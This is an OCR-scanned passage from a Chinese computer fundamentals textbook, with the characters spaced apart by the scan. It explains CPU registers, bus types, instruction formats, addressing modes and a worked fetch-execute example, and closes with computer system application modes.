果 一 个 操作 数 不 需 要 修改 ,而 直接 从 总 线 2 传送 到 总 线 3, 那 么 可 以 通过 控制 总 线 旁 路 器 
把 数据 传 出 ;如 果 一 个 操作 数 传送 时 需要 修改 ,那么 就 借助 于 ALU。 很 显然 ,三 总 线 结构 
的 运算 器 的 特点 是 操作 时 间 快 ,但 需要 的 总 线 多 。 

3. CPU 的 处 理 速度 

大 型 计算 机 在 设计 和 生产 时 是 作为 一 个 整体 来 考虑 的 ,CPU 只 是 系统 的 一 个 部 件 。 
在 这 样 的 计算 机 系统 里 ,通常 使 用 CPU 每 秒 钟 执行 的 机 器 指令 数目 来 量度 CPU 工作 速 
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图 1-5 三 总 线 结构 运算 器 


度 。 一 个 较为 传统 的 单位 是 MIPS( 百 万 条 指令 /每 秒 ) 。 当 然 , 不 同 的 机 器 指令 的 执行 时 
间 并 不 一 定 相 同 ,但 是 MIPS 这 种 描述 简单 直观 ,也 能 大 致 上 表示 出 CPU 的 主要 性 能 ,所 
以 仍然 广泛 使 用 。 

计算 机 部 件 通常 由 不 同 的 厂商 独立 生产 。 由 于 CPU 厂商 无 法 预料 计算 机 其 他 组 成 
部 分 的 性 能 ,因此 常常 将 CPU 的 主 频 作 为 计算 机 性 能 的 一 个 参照 指标 。 所 谓 主 频 ,就 是 
CPU 的 时 钟 频率 ,常用 的 单位 是 MHz( 兆 赫 )。 假 如 CPU 的 主 频 是 1MHz, 就 是 说 1 秒 
钟 产 生 一 百 万 个 时 间 信 号 ,或 者 说 每 个 时 钟 周期 是 百 万 分 之 一 秒 。 一 条 机 器 指令 要 经 过 
若干 个 机 器 周期 才能 完成 ,而 每 一 个 机 器 周期 又 由 若干 个 时 钟 周期 组 成 。 

要 注意 的 是 ,CPU 主 频 只 是 计算 机 性 能 的 一 个 量度 参数 ,并 不 代表 计算 机 真正 的 运 
算 速 度 。 计 算 机 的 整体 性 能 由 总 线 频 率 ( 外 频 )、 内 存 容量 和 外 部 设备 性 能 等 多 种 因素 来 
共同 决定 。 

4. CPU 基本 功能 

CPU 对 整个 计算 机 系统 的 运行 是 极其 重要 的 , 它 具 有 如 下 4 方面 的 基本 功能 。 

(1) 指令 控制 。 程 序 的 顺序 控制 称 为 指令 控制 。 由 于 程序 是 一 个 指令 序列 ,这 些 指 
令 的 顺序 不 能 任意 颠倒 ,必须 严格 按 程序 规定 的 顺序 进行 。 

(2) 操作 控制 。 一 条 指令 的 功能 往往 是 由 若干 个 操作 信号 的 组 合 来 实现 的 ,因此 ， 
CPU 管理 并 产生 由 内 存 取出 的 每 条 指令 的 操作 信号 ,把 各 种 操作 信号 送 往 相 应 的 部 件 ， 
从 而 控制 这 些 部 件 按 指令 的 要 求 执行 。 

(3) 时 间 控 制 。 对 各 种 操作 实施 时 间 上 的 定时 称 为 时 间 控 制 。 在 计算 机 中 ,各 种 指 
令 的 操作 信号 以 及 一 条 指令 的 整个 执行 过 程 都 受到 严格 的 时 间 定 时 。 

(4) 数据 加 工 。 数 据 加 工 就 是 对 数据 进行 算术 运算 和 逻辑 运算 处 理 并 进行 逻辑 测 
试 ,例如 零 值 测试 两 个 值 的 比较 等 。 数 据 加 工 处 理 部 件 由 算术 逻辑 单元 .累加 寄存 器 、 数 
据 缓冲 寄存 器 和 状态 条 件 寄存 器 组 成 ,相对 控制 器 而 言 ,运算 器 接受 控制 器 的 命令 而 进行 
动作 , 即 运算 器 所 进行 的 全 部 操作 都 是 由 控制 器 发 出 的 控制 信号 来 指挥 的 。 

5. CPU 的 基本 结构 

在 CPU 中 至 少 要 有 6 类 寄存 器 。 根 据 需 要 ,可 以 扩充 其 数目 。 下 面 介绍 一 下 这 些 寄 
存 器 的 功能 与 结构 。 
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(1) 数据 缓冲 寄存 器 。 数 据 缓 冲 寄 存 器 用 来 暂时 存放 由 内 存 读 出 的 一 条 指令 或 一 个 
数据 字 ; 反 之 , 当 向 内 存 存 人 一 条 指令 或 一 个 数据 字 时 ,也 暂时 将 它们 存放 在 数据 缓冲 寄 
存 器 中 。 缓 冲 寄存 器 的 作用 是 作为 CPU、 内 存 和 外 部 设备 之 间 信 息 传送 的 中 转 站 ,弥补 
CPU、 内 存 和 外 部 设备 之 间 在 操作 速度 上 的 差别 等 。 

(2) 指令 寄存 器 。 指 令 寄 存 器 用 来 保存 当前 正在 执行 的 一 条 指令 。 当 执行 一 条 指令 
时 , 先 把 它 从 内 存 取 到 缓冲 寄存 器 中 ,然后 再 传送 至 指令 寄存 器 。 指 令 划 分 为 操作 码 和 地 
址 码 字 段 , 由 二 进 制 数字 组 成 。 为 了 执行 任何 给 定 的 指令 ,必须 对 操作 码 进行 测试 ,以 便 
识别 所 要 求 的 操作 ,指令 译 码 器 就 是 做 这 项 工作 的 。 指 令 寄存 器 中 操作 码 字段 的 输出 就 
是 指令 译 码 器 的 输入 ,操作 码 经 译 码 后 即 可 向 操作 控制 器 发 出 具体 操作 的 特定 信和 号。 

(3) 程序 计数 器 。 为 了 保证 程序 能 够 连续 地 执行 下 去 ,CPU 必须 确定 下 一 条 指令 的 
地 址 。 而 程序 计数 器 正 是 起 到 这 种 作用 ,所 以 通常 又 称 为 指令 计数 器 。 在 程序 开始 执行 
前 ,必须 将 它 的 起 始 地 址 , 即 程序 的 一 条 指令 所 在 的 内 存单 元 地 址 送 入 程序 计数 器 ,因此 
程序 计数 器 的 内 容 即 是 从 内 存 提取 的 第 一 条 指令 的 地 址 。 当 执行 指令 时 ,CPU 将 自动 修 
改 程序 计数 器 的 内 容 , 以 便 使 其 保存 将 要 执行 的 下 一 条 指令 的 地 址 。 由 于 大 多 数 指令 都 
是 按 顺 序 来 执行 的 ,所 以 修改 的 过 程 通常 只 是 简单 的 对 程序 计数 器 加 1。 但 是 , 当 遇 到 转 
移 指令 如 JMP 指令 时 ,那么 后 继 指令 的 地 址 ( 即 程序 计数 器 的 内 容 ) 必 须 从 指令 的 地 址 段 
取得 。 在 这 种 情况 下 ,下 一 条 从 内 存 取出 的 指令 将 由 转移 指令 来 规定 ,而 不 是 像 通常 一 样 
按 顺序 来 取得 。 因 此 程序 计数 器 具有 寄存 信息 和 计数 两 种 基本 功能 。 

(4) 地 址 寄存 器 。 地 址 寄存 器 用 来 保存 当前 CPU 所 访问 的 内 存单 元 的 地 址 。 由 于 
在 内 存 和 CPU 之 间 存 在 着 操作 速度 上 的 差别 ,所 以 必须 使 用 地 址 寄存 器 来 保持 地 址 信 
息 ,直到 内 存 的 读 / 写 操作 完成 为 止 。 当 CPU 和 内 存 进行 信息 交换 , 即 CPU 向 内 存 存 / 
取 数 据 时 ,或 者 CPU 从 内 存 中 读 出 指令 时 ,都 要 使 用 地 址 寄存 器 和 数据 缓冲 寄存 器 。 同 
样 ,如果 把 外 部 设备 的 设备 地 址 当 内 存 地 址 单元 看 待 ,那么 , 当 CPU 和 外 部 设备 交换 信 
息 时 ,同样 要 使 用 地 址 寄存 器 和 数据 缓冲 寄存 器 。 

(5) 累加 寄存 器 。 累 加 寄存 器 通常 简称 为 累加 器 , 它 是 一 个 通用 寄存 器 。 其 功能 是 : 
当 运 算 器 的 算术 逻辑 单元 ALU 执行 算术 或 逻辑 运算 时 ,为 ALU 提供 一 个 工作 区 。 累 加 
寄存 器 暂时 存放 ALU 运算 的 结果 信息 。 显 然 ,运算 器 中 至 少 要 有 一 个 累加 寄存 器 。 当 
使 用 多 个 累加 器 时 ,其 中 任何 一 个 可 存放 源 操作 数 ,也 可 存放 结果 操作 数 。 在 这 种 情况 
下 ,需要 在 指令 格式 中 对 寄存 器 加 以 编 址 。 

(6) 状态 条 件 寄存 器 。 状 态 条 件 寄 存 器 保存 由 算术 指令 和 逻辑 指令 运行 或 测试 的 结 
果 建 立 的 各 种 条 件 码 内 容 , 如 运算 结果 进位 标志 (C) ,运算 结果 溢出 标志 (V) ,运算 结果 零 
标志 (Z) ,运算 结果 负 标 志 (N) 等 。 这 些 标志 位 通常 分 别 由 1 位 触发 器 保存 。 除 此 之 外 ， 
状态 条 件 寄存 器 还 保存 中 断 和 系统 工作 状态 等 信息 ,以 便 使 CPU 和 系统 能 及 时 了 解 机 
器 运行 状态 和 程序 运行 状态 。 因 此 ,状态 条 件 寄存 器 是 一 个 由 各 种 状态 条 件 标志 拼凑 而 
成 的 寄存 器 。 

从 上 可 知 ,在 CPU 中 的 六 类 主要 寄存 器 中 ,每 一 个 完成 一 种 特定 的 功能 。CPU 从 存 
储 器 取出 一 条 指令 并 执行 这 条 指令 的 时 间 称 为 指令 周期 。 
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总 线 是 在 计算 机 系统 各 组 成 部 件 之 间 传 送 数据 的 一 组 公共 信号 线 的 集合 。 总 线 可 以 
分 为 内 部 总 线 和 外 部 总 线 。 内 部 总 线 是 指 在 CPU 内 部 连接 寄存 器 、 运 算 器 ,控制 器 进行 
数据 传送 所 使 用 的 总 线 ; 外 部 总 线 是 连接 CPU、 内 存 、.1/O 设备 接口 各 种 部 件 , 进 行 信息 
传送 的 总 线 , 也 称 为 系统 总 线 。 

1. 系统 总 线 的 种 类 

从 逻辑 功能 的 角度 来 说 ,按照 总 线 上 传输 的 信息 内 容 , 可 以 把 系统 总 线 分 为 数据 总 
线 、 地 址 总 线 和 控制 总 线 三 类 。 地 址 总 线 用 来 传送 地 址 信息 ,数据 总 线 用 来 传送 数据 信 
息 , 控 制 总 线 用 来 传送 控制 信号 。 系 统 总 线 大 多 采用 并 行 传 送 方式 来 传输 信息 ,以 保证 数 
据 的 传送 速度 。 

(1) 数据 总 线 。 数 据 总 线 是 双向 传输 数据 的 通道 。 数 据 总 线 宽 度 是 指 能 同时 传送 的 
数据 位 数 ,也 就 是 访问 内 存单 元 或 者 1/O 设备 接口 时 一 次 能 够 交换 的 数据 位 数 。 例 如 计 
算 机 字 长 32 位 ,那么 需要 宽度 为 32 位 的 数据 总 线 进 行 并 行 传送 。 

(2) 地 址 总 线 。 地 址 总 线 是 单 向 传输 通道 ,把 CPU 要 访问 的 地 址 传送 到 内 存 或 IO 
设备 接口 ,用 以 指定 某 个 内 存单 元 或 某 个 外 部 设备 的 输入 输出 接口 位 置 。 地 址 总 线 宽度 
决定 了 访问 的 地 址 空间 容量 。 例 如 ,数据 空间 容量 一 共有 2" 个 地 址 ,那么 地 址 总 线 一 次 
要 传送 n 位 地 址 数据 ,因此 要 配备 宽度 为 n 位 的 地 址 总 线 。 

(3) 控制 总 线 。 控 制 总 线 负责 在 中 央 处 理 器 和 其 他 部 件 之 间 传 送 控制 指令 ,包括 内 
存单 元 ,1/O 接口 的 读 写 、 同 步 信号 和 中 断 信号 等 。 

2. 总 线 结构 

系统 总 线 连接 CPU、 内 存 和 I/O 设备 接口 。 总 线 的 布置 以 及 与 各 个 部 件 的 连接 方式 
会 对 计算 机 系统 的 总 体 性 能 产生 重大 影响 。 依 据 不 同 的 连接 方式 ,可 以 把 总 线 结构 分 成 
单 总 线 和 多 总 线 两 类 。 

使 用 单一 总 线 来 连接 CPU、 内 存 和 1/O 接口 , 称 为 单 总 线 结构 ,多 为 微型 机 和 小 型 机 
采用 。 单 总 线 结构 简单 ,便于 扩充 ,但 由 于 所 有 信息 的 传送 都 要 经 过 唯一 的 一 条 总 线 , 高 
速 部 件 (CPU 和 内 存 ) 和 低速 部 件 ( 输 入 输出 I/O 设备 ) 竞 争 占用 总 线 可 能 会 成 为 计算 机 
的 瓶颈 ,因此 要 采用 其 他 技术 来 缓解 这 个 矛盾 。 

为 解决 IO 设备 和 CPU、 主 存 之 间 传 送 速率 的 差异 ,整体 上 提高 系统 的 数据 传送 效 
率 , 可 以 采用 多 总 线 结构 。 用 高 速 专用 总 线 连接 CPU 和 内 存 , 把 速度 较 低 的 1/O 设备 分 
离 出 去 ,形成 系统 总 线 与 /O 总 线 分 开 的 双 总 线 结构 。 

大 ,中 型 计算 机 往往 采用 三 总 线 结构 。 由 所 谓 “ 通 道 " 来 管理 1/O 设备 ,通道 实质 上 
是 一 台 专 用 的 IO 处 理 器 。 计 算 机 使 用 三 类 不 同 的 总 线 ,CPU 和 内 存 由 高 速 总 线 连 接 ， 
它们 和 通道 由 系统 总 线 连接 ,所 有 的 1/O 接口 都 挂 在 1/O 总 线 上 ,由 通道 负责 控制 。 

除 上 述 总 线 外 ,还 有 其 他 的 总 线 连接 方式 ,这 是 计算 机 体系 结构 设计 时 必须 考虑 的 
问题 。 
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1.2 计算 机 的 基本 工作 过 程 


计算 机 之 所 以 能 够 从 外 部 世界 接收 数据 ,并 且 进 行 处 理 ,然后 把 处 理 结果 送 往外 部 世 
界 ,这 是 由 于 计算 机 能 够 按照 指定 的 命令 来 执行 特定 操作 的 结果 。 在 计算 机 中 ,把 这 种 计 
算 机 硬件 能 够 直接 识别 和 执行 的 命令 称 之 为 指令 。 

指令 和 数据 均 放 在 内 存 里 。 从 形式 上 看 ,它们 都 是 二 进 制 代码 ,人 很 难 区 分 出 这 些 代 
码 是 指令 还 是 数据 ,然而 CPU 却 能 识别 这 些 二 进 制 代码 。 计 算 机 所 以 能 自动 工作 ,是 因 
为 CPU 能 从 存放 程序 的 内 存 里 取出 一 条 指令 、 分 析 指令 并 执行 这 条 指令 ; 紧 接着 又 是 取 
指令 ,分 析 指令 ,执行 指令 …… 如 此 周而复始 ,构成 了 一 个 封闭 的 循环 。 除 非 遇 到 停机 指 
令 ,否则 这 个 循环 将 一 直 继 续 下 去 。 

CPU 每 取出 并 执行 一 条 指令 时 ,都 要 完成 一 系列 的 操作 ,这 一 系列 操作 所 需 的 时 间 
通常 称 为 一 个 指令 周期 。 更 简单 地 说 ,指令 周期 是 取出 并 执行 一 条 指令 的 时 间 。 由 于 各 
种 指令 的 操作 功能 不 同 ,因此 各 种 指令 的 指令 周期 是 不 尽 相同 的 。 
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指令 的 内 容 由 两 部 分 组 成 , 即 操作 的 性 质 和 操作 的 地 址 。 前 者 称 为 操作 码 , 后 者 称 为 
地 址 码 。 操 作 码 字 段 表示 指令 的 操作 特性 与 功能 ,指出 指令 所 进行 的 操作 ,如 加 、 减 、 乘 、 
除 、 取 数 , 存 数 等 ,设计 如 下 指令 操作 码 , 如 表 1-2 所 示 。 


表 1-2 指令 操作 码 
指令 操作 码 指令 操作 码 
加 法 001 取 整 101 
减法 010 存 数 110 
乘法 011 打印 111 
除法 100 停机 000 


地 址 码 字 段 指示 操作 数 的 地 址 ,表示 参加 运算 的 数据 应 从 存储 器 的 哪个 单元 取 , 运 算 
的 结果 应 存 到 哪个 单元 。 
1. 二 地 址 指令 


OPR X 党 


在 二 地 址 指令 中 将 X 地 址 的 操作 数 与 Y 地 址 的 操作 数 执行 OPR 操作 ,将 结果 数 送 
于 立地 址 中 。 
2. 单 地 址 指令 


OPR X 
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为 了 进一步 缩短 机 器 指令 码 的 长 度 ,以 节省 存储 器 空间 ,减少 访问 内 存 的 次 数 。 还 可 
以 从 指令 码 中 再 去 掉 一 个 操作 数 地 址 .结果 在 指令 码 中 仅 剩 下 一 个 操作 数 地 址 码 了 。 但 
是 大 多 数 运算 操作 必须 有 两 个 操作 数 ( 二 元 运算 ), 这 就 可 以 利用 硬件 来 隐 含 地 提供 男 一 
个 操作 数 和 结果 数 的 地 址 。 提 供 隐 含 操作 数 的 硬件 称 为 累加 器 。 
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数据 或 指令 在 存储 器 中 存放 的 位 置 称 之 为 地 址 。 存 放 指 令 的 地 址 称 之 为 指令 地 址 ; 
存放 数据 的 地 址 称 之 为 操作 数 地 址 。 在 程序 中 各 条 指令 的 地 址 一 般 是 按 顺 序 排 列 的 , 因 
此 计算 机 也 是 按 顺序 执行 的 。 如 果 需 要 改变 指令 执行 顺序 ,可 以 利用 转移 指令 ,但 是 转移 
之 后 仍然 按 顺序 执行 。 数 据 在 存储 器 中 也 是 按 一 定 顺序 存放 的 , 即 在 存储 器 中 设 有 数据 
区 。 但 在 程序 执行 过 程 中 ,有 些 数据 可 能 需要 多 次 反复 使 用 ,而 且 并 无 一 定 规律 可 循 ,这 
就 提出 了 寻找 操作 数 地 址 的 问题 。 通 常 把 寻找 操作 数 地 址 的 方式 称 之 为 寻 址 方式 ,把 寻 
找 操作 数 地 址 的 过 程 称 之 为 寻 址 过 程 。 寻 址 方式 的 种 类 越 多 , 则 计算 机 的 功能 越 强 ,灵活 
性 越 大 。 寻 址 方式 所 要 解决 的 主要 问题 是 如 何在 整个 内 存 地 址 空间 内 ,方便 .灵活 地 找到 
所 需要 的 单元 地 址 。 

一 个 指令 系统 包含 哪 几 种 寻 址 方式 ,能 否 为 程序 设计 提供 方便 是 指令 系统 设计 的 关键 。 
在 不 同 的 计算 机 中 , 寻 址 方式 的 分 类 和 名 称 不 统一 。 下 面 简单 介绍 几 种 典型 的 寻 址 方式 。 

1. 立即 寻 址 

立即 寻 址 是 为 一 条 指令 确定 一 个 操作 数 的 最 简单 方法 。 在 立即 寻 址 方式 中 ,指令 的 
地 址 码 作为 实际 的 操作 数 。 立 即 的 含义 是 指 在 同一 时 间 内 ,指令 本 身 被 取出 来 时 ,操作 数 
也 同时 被 取出 来 了 ,这 个 操作 数 立即 就 可 以 使 用 了 。 

2. 直接 寻 址 

指令 中 的 地 址 码 就 是 操作 数 的 实际 地 址 , 即 按照 这 个 地 址 能 够 从 存储 器 中 直接 取得 
操作 数 ,这 样 的 寻 址 方式 称 为 直接 寻 址 方式 。 由 于 在 直接 寻 址 方式 中 给 出 的 操作 数 地址 
与 程序 本 身 所 在 的 位 置 无 关 , 因 此 又 称 绝对 寻 址 方式 。 

3. 间接 寻 址 

在 指令 中 的 地 址 码 不 是 操作 数 的 地 址 ,而 是 存放 操作 数 地 址 的 内 存单 元 地 址 ,这 个 地 
址 称 为 间接 地 址 。 利 用 间接 地 址 的 寻 址 方式 称 为 间接 寻 址 方式 。 
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表 1-3 中 列 出 了 由 两 条 指令 组 成 的 一 个 简单 程序 。 下 面 通过 CPU 执行 这 一 程序 的 
过 程 , 即 通 过 每 一 条 指令 取 指令 阶段 与 执行 指令 阶段 的 分 解 动作 ,来 具体 认识 每 一 条 指令 
的 指令 周期 (假定 ,程序 已 装 入 内 存 中 )。 


表 1-3 简单 程序 
八进制 地 址 八进制 内 容 助 记 符 
020 250 000 CLA 


021 010 010 ADD 10 
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1. 取 第 一 条 指令 CLA 

(1) 程序 计数 器 PC 的 内 容 020 被 装 入 总 线 地 址 寄存 器 。 

(2) 程序 计数 器 内 容 加 1, 变 成 021, 为 取 下 一 条 指令 做 好 准备 。 

(3) 地 址 寄存 器 的 内 容 被 放 到 地 址 总 线 上 ,经 地 址 总 线 送 到 内 存 地 址 寄存 器 。 

(4) 所 选 存储 器 单元 020 中 的 内 容 经 过 数据 总 线 ,传送 到 数据 缓冲 寄存 器 。 

(5) 数据 缓冲 寄存 器 的 内 容 经 数据 总 线 传送 到 指令 寄存 器 。 

(6) 指令 寄存 器 中 的 操作 码 被 译 码 或 测试 。 

(7) CPU 识别 出 指令 内 容 是 CLA, 至 此 , 取 指 令 阶段 结束 。 

2. 执行 CLA 指令 阶段 

(1) 操作 控制 器 发 送 一 控制 信号 给 算术 逻辑 运算 单元 ALU。 

(2) ALU 响应 该 控制 信号 ,将 累加 寄存 器 的 内 容 全 部 清 零 ,从 而 执行 了 CLA 指令 。 

3. 取 下 一 条 指令 ADD 

该 过 程 与 取 第 一 条 指令 相同 。 取 指 结束 后 ,程序 计数 器 的 内 容 变 成 022 ,指令 寄存 器 
中 已 经 存 好 ADD 指令 并 进行 译 码 。 

4. 执行 ADD 10 指令 阶段 

(1) 把 指令 寄存 器 中 的 地 址 码 部 分 (10) 装 和 地址 寄存 器 ,其 中 10 为 内 存 中 存放 操作 
数 的 地 址 。 

(2) 把 地 址 寄存 器 中 的 操作 数 的 地 址 (10) 发 送 到 地 址 总 线 上 。 

(3) 在 存储 器 单元 10 中 读 出 操作 数 ,假定 该 数 是 8, 并 经 过 数据 总 线 传送 到 缓冲 寄 
存 器 。 

(4) 执行 加 操作 : 由 数据 缓冲 寄存 器 得 来 的 操作 数 8 可 送 往 ALU 的 一 个 输入 端 ,将 
等 候 在 累加 器 内 的 另 一 个 操作 数 (因为 CLA 指令 执行 结束 后 累加 器 内 容 为 零 ) 送 往 ALU 
的 另 一 个 输入 端 , 于 是 ALU 将 两 数 相 加 ,产生 运算 结果 为 0 十 8 二 8。 

当 计算 机 进行 计算 时 ,指令 必须 是 按 一 定 的 顺序 一 条 接 一 条 进行 。 控 制 器 的 基本 任 
务 就 是 按照 计算 程序 所 排 的 指令 序列 , 先 从 存储 器 取出 一 条 指令 放 到 控制 器 中 ,对 该 指令 
的 操作 码 由 译 码 器 进行 分 析 判 别 , 然 后 根据 指令 性 质 ,执行 这 条 指令 ,进行 相应 的 操作 。 
接着 从 存储 器 取出 第 二 条 指令 ,再 执行 这 第 二 条 指令 。 因 此 ,控制 器 反复 交替 地 处 在 取 指 
令 周 期 与 执行 指令 周期 之 中 。 每 取出 一 条 指令 ,控制 器 中 的 指令 计数 器 就 加 1, 从 而 为 取 
下 一 条 指令 做 好 准备 。 从 形式 上 看 ,指令 和 数据 都 是 二 进 制 数码 。 一 般 来 讲 , 在 取 指 周期 
中 从 内 存 读 出 的 信息 是 指令 流 , 它 流向 控制 器 ;而 执行 周期 中 从 内 存 读 出 的 信息 流 是 数据 
流 , 它 由 内 存 流向 运算 器 。 


1.3 计算 机 系统 
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1. 系统 
系统 是 指 由 若干 个 既 相互 区 别 , 又 相互 联系 、 相 互 作用 、 相 互 影响 、 相 互 依存 的 成 分 所 
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组 成 的 一 个 有 机 整体 。 人 们 习惯 把 组 成 计算 机 系统 的 所 有 成 分 分 为 两 大 部 分 : 硬件 系统 
和 软件 系统 ,如 图 1-6 所 示 。 
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图 1-6 计算 机 系统 


2. 硬件 

硬件 是 组 成 计算 机 的 硬件 部 件 的 总 称 。 如 前 所 述 ,CPU 是 计算 机 的 中 枢 , 负 责 执 行 
运算 和 控制 系统 数据 处 理 的 全 过 程 。 其 中 ,运算 器 用 于 执行 算术 运算 和 逻辑 运算 。 控 制 
器 控制 与 协调 运算 存储、 输入 输出 等 数据 处 理 动作 的 启动 和 执行 顺序 。 这 种 控制 大 体 上 
是 通过 执行 机 器 指令 的 机 器 周期 来 实现 的 。 此 外 ,CPU 还 包含 寄存 器 。 运 算 器 和 控制 器 
工作 过 程 中 需要 使 用 各 种 寄存 器 来 暂时 保存 信息 ,如 数据 通用 寄存 器 .累加 器 、 指 令 寄 存 
器 和 程序 计数 器 等 。 

一 般 把 存储 器 分 为 4 级 : 外 存 、 内 存 、 高 速 缓存 和 寄存 器 。 从 体系 结构 的 角度 出 发 ， 
外 存储 器 也 是 一 类 输入 输出 设备 ,内 存储 器 和 高 速 缓冲 存储 器 构成 计算 机 的 主 存储 器 , 寄 
存 器 则 属于 CPU 。 

输入 输出 设备 负责 计算 机 系统 界面 上 的 数据 流动 ,实现 计算 机 和 外 部 环境 之 间 的 通 
信 。I/O 设备 也 习惯 称 为 外 部 设备 或 者 外 设 。 

总 线 是 硬件 设备 之 间 的 信息 传送 通道 。 其 中 ,内 部 总 线 连接 CPU 的 各 个 组 成 单元 ， 
而 系统 总 线 则 连接 CPU 和 主 存储 器 .CPU 和 外 部 设备 的 接口 。 

3. 软件 

计算 机 软件 是 程序 文档 数据 和 开发 规范 的 集合 。 软 件 开 发 过 程 必须 基于 工程 化 的 
原则 ,按照 所 规定 的 工程 开发 规范 来 进行 。 所 谓 开发 规范 可 以 用 “4 个 W” 来 理解 , 即 
When、What、How、Who。 一 个 软件 开发 规范 要 明确 规定 ,软件 开发 过 程 中 什么 时 候 要 做 
什么 、 用 什么 技术 方法 做 和 由 什么 人 (角色 ) 来 做 。 有 了 规范 才能 组 织 起 开发 人 员 团 队 , 有 
步骤 地 完成 日 益 庞大 和 复杂 的 软件 开发 任务 。 今 天 ,软件 开发 绝对 不 等 同 于 编写 程序 , 早 
已 摆脱 了 早期 那 种 一 两 个 人 祥 思 苦 想 的 手工 艺 技巧 方式 。 

在 汽车 制造 厂 ,汽车 是 终极 产品 ,伴随 设计 和 制造 过 程 的 各 个 步骤 会 有 很 多 技术 资料 
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和 管理 资料 在 产生 、 被 使 用 。 这 就 是 文档 (document) 的 概念 。 软 件 的 工程 化 开发 方式 也 
一 样 。 程 序 是 软件 开发 的 终极 结果 ,整个 开发 过 程 
不 能 只 存在 于 开发 人 员 的 脑袋 当中 。 所 使 用 的 技术 
和 管理 资料 应 该 以 某 种 可 视 化 形式 呈现 。 形 成 文 
档 、 使 用 文档 是 现代 软件 开发 方法 的 要 点 之 一 。 计 
算 机 软件 也 是 一 个 系统 ,包含 了 完成 形形色色 功能 
的 程序 ,如 图 1-7 所 示 。 

4. 硬件 和 软件 的 关系 

硬件 和 软件 相辅相成 ,协同 完成 数据 处 理 过 程 。 
硬件 是 软件 驻 留 和 执行 的 物质 基础 ,而 软件 体现 了 
对 硬件 运行 动作 的 控制 和 协调 。 

在 计算 机 科学 发 展 的 过 程 中 ,硬件 技术 和 软件 图 1-7 计算 机 软件 层次 结构 图 
技术 是 相互 促进 的 。 比 如 ,因为 结构 体系 里 引入 了 
中 断 (interrupt) 机 制 ,在 特定 的 事件 发 生 时 CPU 会 终止 当前 程序 的 执行 ,转移 到 规定 的 
另外 一 个 程序 的 入 口 。 中 断 机 制 促进 了 操作 系统 的 研发 ,使 操作 系统 成 为 计算 机 系统 软 
件 的 核心 基础 。 

硬件 和 软件 的 界面 有 一 定 程度 的 浮动 性 。 比 如 浮 点 运算 问题 ,习惯 把 形 如 1. 5 Xx 
10“ 的 数 称 为 浮 点 数 。 要 对 浮 点 数 进行 运算 需要 特别 的 算法 ,但 也 可 以 增加 协 处 理 器 硬 
件 ( 浮 点 运算 单元 ) 用 以 直接 运算 浮 点 数 。 

几 十 年 来 ,硬件 技术 的 飞速 发 展 根本 性 地 促进 了 软件 技术 方法 的 变革 。 今 天 , 极 低 的 
存储 成 本 和 极 高 速 的 CPU 使 软件 开发 人 员 不 必 再 把 时 间 效 率 和 空间 效率 作为 一 般 软 件 
的 设计 考虑 重点 , 转 而 追寻 能 够 提高 软件 开发 效率 和 质量 的 技术 方法 。 
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所 谓 系 统 应 用 模式 ,是 指 计算 机 应 用 系统 在 使 用 环境 中 的 任务 安排 方式 。 下 面 是 主 
流 的 几 种 应 用 模式 。 

1. 主机 /终端 模式 

主机 /终端 模式 是 一 种 集中 式 系统 ,传统 的 计算 机 应 用 模式 。 软 、 硬 件 资源 全 部 集中 
在 一 台 功 能 强大 的 计算 机 里 ,一切 任务 都 在 上 面 完 成 。 

大 型 集中 式 系统 的 计算 机 称 为 主机 ,用 多 用 户 工 作 方式 ,每 个 用 户 通过 终端 设备 和 主 
机 交互 。 通 常 ,终端 是 些 1O 设备 ,不 能 独立 于 主机 工作 ,也 习惯 把 CPU、 内 存 、 外 设 接 
口 .总 线 和 电源 等 部 分 称 为 主机 。 除 主机 之 外 ,多 配备 显示 器 、 键 盘 和 打印 机 等 传统 外 设 。 

集中 式 系统 以 往 通常 只 配置 一 个 CPU。 近 年 来 新 技术 不 断 涌现 ,所 谓 “ 多 核 "CPU 
是 指 在 一 个 CPU 芯片 上 集成 多 个 “工作 中 心 ”, 以 提高 工作 速度 。 

使 用 多 个 CPU(CPU 阵列 ) 的 集中 式 系 统 结构 日 渐 成 熟 , 竟 定 了 并 行 处 理 系 统 的 
基础 。 

2. 客户 机 /服务 器 模式 

服务 器 (Server) 其 实 就 是 一 台 配 置 比较 齐全 功能 比较 强大 的 计算 机 ,可 用 一 般 计 算 
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机 充当 ,更 多 时 候 会 采用 专门 生产 的 所 谓 专用 服务 器 。 客 户 端 也 是 一 台独 立 计算 机 ,通常 
面 对 个 人 用 户 , 多 用 个 人 计算 机 充当 。 客 户 机 和 服务 器 在 计算 机 网 络 环 境 中 构成 应 用 的 
客户 机 /服务 器 (Client/Server,C/S) 模 式 。 

C/S 方 式 是 一 种 所 谓 “ 请 求 一 响应 ”的 应 答 模 式 。 客 户 机 在 运行 应 用 程序 的 过 程 中 提 
出 服务 请 求 , 经 由 网 络 传送 到 服务 器 去 ,服务 器 利用 本 身 软 ,硬件 资源 的 优势 ,接受 并 满足 
客户 提出 的 请 求 ,提供 服 务 ,把 执行 后 产生 的 结果 数据 回 送 到 客户 机 上 去 ,由 客户 机 进 一 
步 处 理 后 再 提交 给 用 户 。 这 样 , 多 个 客户 机 可 以 共享 服务 器 提供 的 服务 资源 。 

和 集中 式 系统 的 重要 区 别 在 于 ,客户 机 不 是 哑 终 端 ,而 是 能 够 独立 运行 的 计算 机 。 运 
算 任务 由 客户 机 和 服务 器 共同 分 担 。 典 型 做 法 是 应 用 程序 的 运行 .数据 的 输入 输出 在 客 
户 机 上 进行 ,而 一 些 共 同 的 .复杂 的 、 需 要 更 多 资源 的 任务 则 分 配 到 服务 器 上 执行 。 

例如 ,对 于 要 访问 数据 库 的 应 用 ,C/S 模式 的 做 法 是 海量 的 数据 集中 保存 在 服务 器 磁 
盘 上 ,管理 数据 库 的 系统 软件 DBMS 也 驻 留 在 服务 器 上 。DBMS 接受 各 个 客户 机 上 客户 
应 用 程序 对 数据 库 的 访问 请 求 , 完 成 对 数据 库 的 访问 ,再 通过 网 络 回 送 访问 结果 数据 ,后 
续 动 作 在 客户 机 上 自行 处 理 。 

3. 浏览 器 /服务 器 模式 

浏览 器 能 够 读 取 和 展示 网 络 上 某 台 计算 机 里 以 超 文 本 格式 存放 的 文档 。 超 文本 
(hypertext) 的 意思 是 文档 的 数据 以 文字 、 图 像 、 视 频 和 音频 等 多 媒体 对 象 的 形式 出 现 
除数 据 之 外 , 超 文本 文档 还 包含 彼此 之 间 的 链接 ,组 成 了 一 个 网 状 数据 组 织 , 这 就 是 所 谓 
的 万 维 网 (WWW)。 

